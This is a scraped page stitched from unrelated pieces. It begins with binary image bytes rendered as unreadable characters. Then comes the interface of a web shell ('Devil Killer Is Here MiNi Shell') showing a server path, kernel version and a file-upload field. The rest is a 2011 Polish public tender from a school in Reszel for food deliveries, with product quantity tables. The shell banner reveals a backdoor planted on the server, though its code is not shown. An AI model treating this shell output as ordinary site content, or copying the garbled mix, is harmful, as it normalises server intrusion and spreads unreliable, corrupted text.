JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111222/435290-N-2011.html

<p class="kh_header"><b>Reszel: Dostawa produktów spożywczych na żywienie w Szkole Podstawowej  nr 3 w Reszlu.</b><br>
<b>Numer ogłoszenia: 435290 - 2011; data zamieszczenia: 22.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 3 im. Marii Dąbrowskiej w Reszlu , ul. Konopnickiej 2, 11-440 Reszel, woj. warmińsko-mazurskie, tel. 89 7550196, faks 89 7550992.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: edukacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych na żywienie w Szkole Podstawowej  nr 3 w Reszlu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są sukcesywne dostawy produktów spożywczych na żywienie w Szkole Podstawowej  nr 3 w Reszlu.
2.Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę wymienionych w niniejszej specyfikacji części zamówienia - zadania od 1 do 7
2.1Przedmiot zamówienia w zakresie zadania część nr 1 dotyczy:
   Produkty zwierzęce, mięso i produkty mięsne, kod CPV 15100000-9
                                                 Produkty drobiowe, kod CPV 15131500-0
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik nr 2 na Zadanie część nr 1 do SIWZ.
2.2Przedmiot zamówienia w zakresie zadania część nr 2 dotyczy:
Różne produkty spożywcze, kod CPV 15800000-6
Produkty przemiału ziarna, kod CPV 15610000-7
Oleje i tłuszcze zwierzęce lub roślinne, kod CPV 15400000-2
                           Produkty cukrownicze kod CPV 15833000-6
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 2 do SIWZ.
2.3Przedmiot zamówienia w zakresie zadania część nr 3 dotyczy:
   Owoce warzywa i produkty podobne, kod CPV 15300000-1 
                             Owoce tropikalne, kod CPV 03222110-7    
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 3 do SIWZ. 
  Ze względu na zamawianie niektórych towarów w sztukach oraz ceny za 1 sztukę do obliczenia ceny będzie się przyjmować że waga wynosi nie mniej niż:
1. Kapusta biała 1 szt. - 3 kg  a w okresie maj czerwiec 2kg
2. Kapusta włoska 1 szt. - 2 kg
3. Kapusta czerwona 1 szt. - 2 kg
4. Por 1 szt. - 0,25 kg
5. Rzodkiewka 1 pęczek - 0,15 kg
6. Sałata 1 szt. - 0,20 kg
7. Szczypior 1 szt. - 0,10 kg
8. Koper 1 szt. - 0,10 kg
9. Natka pietruszki 1 szt. - 0,10 kg
10. Kalafior świeży 1 szt. - 1,2 kg
11. Brokuł świeży 1 szt. - 1,0 kg
12. Czosnek 1 szt. - 0,05 kg
13. Botwina 1 pęczek- 0,20 kg
14. Kiwi 1szt.- 0,11 kg
Również towar zamawiany w kilogramach musi wymagać wymogom jak dla I wyboru.
2.4Przedmiot zamówienia w zakresie zadania część nr 4 dotyczy:
     Produkty mleczarskie, kod CPV 15500000-3 
     Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 4 do SIWZ.
2.5Przedmiot zamówienia w zakresie zadania część nr 5 dotyczy:
     Ryby przetworzone i konserwowane, kod CPV 15200000-0
                    Produkty głęboko mrożone, kod CPV 158960000-5
     Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 5 do  SIWZ.
2.6.Przedmiot zamówienia w zakresie zadania część nr 6 dotyczy:
      Pieczywo świeże wyroby piekarskie i ciastkarskie kod CPV 15810000-9
      Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 6 do  SIWZ.
2.7.Przedmiot zamówienia w zakresie zadania część nr 7 dotyczy:
      Jaja kurze konsumpcyjne świeże klasa A  kod CPV 03142500-3
      Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 7 do  SIWZ.
3.Wymienione wyżej załączniki stanowią integralną część SIWZ z zastrzeżeniem, że wszystkie wskazane z nazwy produkty, (wyroby) spożywcze należy rozumieć jako określenie wymaganych parametrów asortymentowych, zdrowotnych i jakościowych, również w zakresie wielkości opakowań dotyczących każdej części zamówienia. Oznacza to, że zgodnie z art. 29 Ustawy, na wskazane z nazwy produkty spożywcze, zamawiający dopuszcza zastosowanie równoważnych 
produktów spożywczych, nie gorszej jakości niż opisane w załączniku nr 2. Ciężar udowodnienia, że produkty spożywcze są równoważne w stosunku do wymogu określonego przez zamawiającego spoczywa na składającym ofertę. W takim wypadku wykonawca musi przedłożyć odpowiednie dokumenty dopuszczające dane produkt spożywczy do spożycia, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne. 
   Przez ofertę równoważną Zamawiający rozumie:
   Gramatura oferowanego produktu równoważnego nie może być niższa niż gramatura produktu wskazanego w formularzu. Zaoferowane produkty równoważne muszą posiadać te same walory organoleptyczne (smak, zapach, barwa, estetyka, konsystencja) oraz zawierać w swoim składzie te same surowce użyte do produkcji co produkt określony przez Zamawiającego.
4.Zamawiający dopuszcza możliwość składania ofert częściowych. 
Podana ilość jest ilością szacunkową. Zamawiający zastrzega sobie możliwość zmian ilościowych w poszczególnych pozycjach a Wykonawca jest odpowiedzialny za jakość,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.15.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp.
Warunek powyższy zostanie spełniony, jeżeli wykonawca złoży oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli wykonawca złoży oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli wykonawca złoży oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli wykonawca złoży oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz ofertowy  z wykorzystaniem wzoru  załącznik nr 1
2.Wypełniony i podpisany formularz cenowy - z wykorzystaniem wzoru załącznik nr 2 zadanie nr   należy wpisać nr zadania3.Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 3 
4. Oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia  warunków, o których mowa w art.24 ust. 1 ust. Pzp, według wzoru załącznik  nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Zamawiający zastrzega sobie możliwość wprowadzania zmian do umowy w zakresie zmniejszania ilości i wartości dostaw w sytuacjach, których Zamawiający nie mógł przewidzieć w chwili jej zawarcia (np. zmniejszenie stanów żywionych). Zamawiający nie będą ponosili ujemnych skutków finansowych spowodowanych zmniejszeniem ilości i wartości dostaw przewidzianych w umowie. 
2)W przypadku ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy, strony dopuszczają możliwość zmiany stawek podatkowych zgodnie z obowiązującymi przepisami.
3)Załączniki nr 2 stanowiące integralną część SIWZ i wszystkie wskazane w nich z nazwy produkty, (wyroby) spożywcze należy rozumieć jako określenie wymaganych parametrów asortymentowych, zdrowotnych i jakościowych, również w zakresie wielkości opakowań dotyczących każdej części zamówienia. Oznacza to, że zgodnie z art. 29 Ustawy, na wskazane z nazwy produkty spożywcze, zamawiający dopuszcza zastosowanie równoważnych produktów spożywczych, nie gorszej jakości niż opisane w załączniku nr 2. Ciężar udowodnienia, że produkty spożywcze są równoważne w stosunku do wymogu określonego przez zamawiającego spoczywa na składającym ofertę. W takim wypadku wykonawca musi przedłożyć odpowiednie dokumenty dopuszczające dane produkt spożywczy do spożycia, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne.
4)Cena poszczególnych produktów określona w formularzu cenowym Wykonawcy, stanowiącym załącznik nr 2  do umowy, może ulec zmianie w przypadku udokumentowanej zmiany ceny produktu na podstawie klauzuli waloryzacyjnej.
5)Klauzula waloryzacyjna. Cena towaru określona w umowie, w czasie wykonywania zamówienia (w okresie obowiązywania umowy) może być korygowana (w górę lub w dół) na pisemny wniosek jednej ze stron, o wskaźnik zmiany cen żywności dotyczący przedmiotu zamówienia publikowany przez Główny Urząd Statystyczny (GUS) lub Wojewódzki Urząd Statystyczny (WUS) przedstawiany wraz z uzasadnieniem w formie pisemnej (wyciąg  wskaźnika 
zmian cen z GUS lub WUS). Wskaźniki wzrostu cen żywności stanowią podstawę do wprowadzenia nowej ceny w formie aneksu do umowy na dostawy. Nowa cena obowiązuje od dnia podpisania aneksu do umowy z zastrzeżeniem, że pierwsza waloryzacja może nastąpić nie wcześniej niż po 1 miesiącu od dnia podpisania umowy. Strony dopuszczają waloryzację jeżeli zmiana wskaźnika cen przekroczy 2%.
6)Zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy
7)Zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy
8)Wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.
9)Do umowy wprowadza się klauzulę: sposób wykonania przedmiotu zamówienia lub termin dostarczenia towaru może ulec zmianie w przypadku zaistnienia przyczyn nie leżących po stronie Wykonawcy lub Zamawiającego, np. udokumentowanego ogólnego braku na rynku jakiegoś asortymentu produktów spożywczych lub wielkości opakowań, Wykonawca może po uzgodnieniu i uzyskaniu aprobaty przez osobę prowadzącą zapotrzebowania dla stołówki szkolnej dokumentując zaistniałą przyczynę, dostarczyć produkt podobny, równoważny lub w innej wielkości opakowania, w cenie podanej w formularzu cenowym po przeliczeniu na aktualną wielkość opakowania lub towaru z zastrzeżeniem że termin dostarczenia towaru nie może być dłuższy niż 3 dni. O zaistniałym fakcie Wykonawca zobowiązany jest w następnym dniu po otrzymaniu zapotrzebowania na towar, pisemnie powiadomić upoważnionego pracownika szkoły do przekazywania zamówień wykonawcy, pod rygorem zastosowania kar umownych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.reszel.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminna Administracja Szkół i  Sportu w Reszlu ul. Reymonta 1-4, 11-440 Reszel.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2011 godzina 10:00, miejsce: w sekretariacie Gminnej Administracji Szkół i Sportu w Reszlu, ul. Reymonta 1-4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 1 dotyczy:
Produkty zwierzęce, mięso i produkty mięsne, kod CPV 15100000-9
Produkty drobiowe, kod CPV 15131500-0.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	II wieprzowa chuda	60	600	Kg.			
2	Łopatka b/k	60	600	Kg			
3	Schab b/k	30	900	Kg.			
4	Szynka b/k	60	280	Kg.			
5	Kości szpikowe	90	900	Kg			
6	Kości schabowe cięte do 30 - 40 cm.	90	900	Kg.			
7	Filet z kurczaka	90	670	Kg.			
8	Udko z kurczaka	70	200	Kg.			
9	Pałki z kurczaka	60	550	Kg.			
10	Porcje rosołowe z kuprem	60	400	Kg.			
11	Słonina	10	120	Kg.			
12	Smalec 200g	20	170	Kg.			
13	Kiełbasa wędzona (wp.62%, woł.6%)	40	400	Kg.			
14	Kiełbasa biała 90% mięso wieprz.	10	55	Kg.			
15	Kiełbasa lunchmeat (wp.34%, ind.13%, drob.6%)	26	130	Kg.			
16	Boczek wędzony	6	40	Kg.			
                                                                                                 Ogółem: *	X	X			
* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać  do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 2 dotyczy:
Różne produkty spożywcze, kod CPV 15800000-6
Produkty przemiału ziarna, kod CPV 15610000-7
Oleje i tłuszcze zwierzęce lub roślinne, kod CPV 15400000-2
Produkty cukrownicze kod CPV 15833000-6
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 2 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Cukier (1kg)	32	320	Kg			
2	Cukier puder 400g	12	70	Szt.			
3	Cukier wanilinowy 36g	60	300	Szt.			
4	Ketchup 30%, 970 g	25	200	Szt.			
5	Koncentrat pomidorowy 30 %, (970g.)	30	250	Szt.			
6	Kwasek cytrynowy 20 g	55	           480	Szt.			
7	Liść laurowy 12g	2	25	Szt			
8	Maggi 200 g.	60	470	Szt.			
9	Majeranek 20g	30	330	Szt.			
10	Majonez (280g.)	12	150	Szt.			
11	Musztarda 190g	20	200	Szt.			
12	Olej 1l.	50	500	l.			
13	Papryka ostra 20g	10	100	Szt.			
14	Papryka słodka 20g	35	320	Szt.			
15	Pieprz 20g	60	600	Szt.			
16	Maggi 960 ml	3	40	Szt. 			
17	Przypr. do kurczaka 40g	16	120	Szt.			
18	Przypr. do spaghetti 20g	20	200	Szt.			
19	Sól	36	355	Kg.			
20	Warzywko (200 g.)	42	390	Szt.			
21	Ziele angielskie  15g	2	30	Szt.			
22	Czosnek susz	20	220	Szt			
23	Żurek 51g	20	200	Szt.			
24	Mąka tortowa 1kg	75	650	Kg.			
25	Mąka ziemniaczana 0,5 kg	6	70	   Szt.			
26	Kasza jęczmienna 440g	35	350	Szt..			
27	Makaron 1kg	90	900	Szt.			
28	Makaron do spaghetti 0,5kg,	45	500	Szt.			
29	Makaron łazanki 0,5 kg.	45	500	Szt.			
30	Ryż 1kg	30	300	Kg.			
31	Proszek do pieczenia 36g	60	300	Szt.			
32	Soczek DODONI 200ml	4500	24000	Szt.			
33	Soczek (koncentrat) 200 ml. Kubuś	280	2800	Szt.			
34	Sok truskawkowy 0,5 l.	10	100	Szt.			
35	Ciastka herbatniki 100g	30	600	Szt.			
36	Koper susz 20g	12	130	Szt			
37	Natka pietruszki (susz) 20g	6	60	Szt.			
38	Makaron wstążki 400g	28	280	Szt.			
39	Kisiel truskawkowy	10	100	Szt.			
40	Sok koncentrat wysokosłodzony 0,68 l. np.(Betex)	50	600	Szt.			
41	Pieprz ziołowy 18 g.	10	100	Szt.			
42	Przyprawa Uniwersalna 1kg. 	1	4	Szt.			
43	Zacierka Babuni 0,25 kg.	10	60	Szt.			
44	Ocet  10 %  0,5l	2	50	Szt.			
45	Kostki rosołowe drobiowe op. Po 12 kostek	2	20	Szt.			
46	Czekolada mleczna 35% kakao	6	600	Szt.			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać  do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.61.00.00-7, 15.40.00.00-2, 15.83.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 3 dotyczy:
   Owoce warzywa i produkty podobne, kod CPV 15300000-1 
                                   Owoce tropikalne, kod CPV 03222110-7    
  Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony    
  w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 3 do SIWZ. 
  Ze względu na zamawianie niektórych towarów w sztukach oraz ceny za 1 sztukę do obliczenia 
  ceny będzie się przyjmować że.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Kalafior świeży	8	80	Szt.			
2	Kapusta biała	150	1000	Kg.			
3	Kapusta czerwona	7	75	Kg,			
4	Kapusta pekińska	26	400	Kg.			
5	Marchew	90	700	Kg.			
6	Ogórek kiszony 3kg	6	60	Kg.			
7	Ogórek konserwowy 900g, 420g po odsączeniu	28	300	Szt. 			
8	Ogórek świeży	60	600	Kg.			
9	Pieczarki	10	90	Kg.			
10	Pietruszka korzeń	7	70	Kg.			
11	Pomidory	30	300	Kg.			
12	Por	2	20	Szt.			
13	Seler	8	80	Kg.			
14	Ziemniaki	900	9000	Kg.			
15	Burak	40	400	Kg.			
16	Czosnek	30	260	Szt.			
17	Fasola	16	100	Kg.			
18	Fasolka konserwowa zielona 440g, bez zalewy 245g 	4	30	Szt.			
19	Groch	6	65	Kg.			
20	Groszek konserwowy 280g	12	120	Szt.			
21	Grzybki susz 1,5g	6	60	Szt.			
22	Koper świeży	20	100	Pęcz.			
23	Natka pietruszki świeża	36	360	Szt.			
24	Cebula	90	900	Kg.			
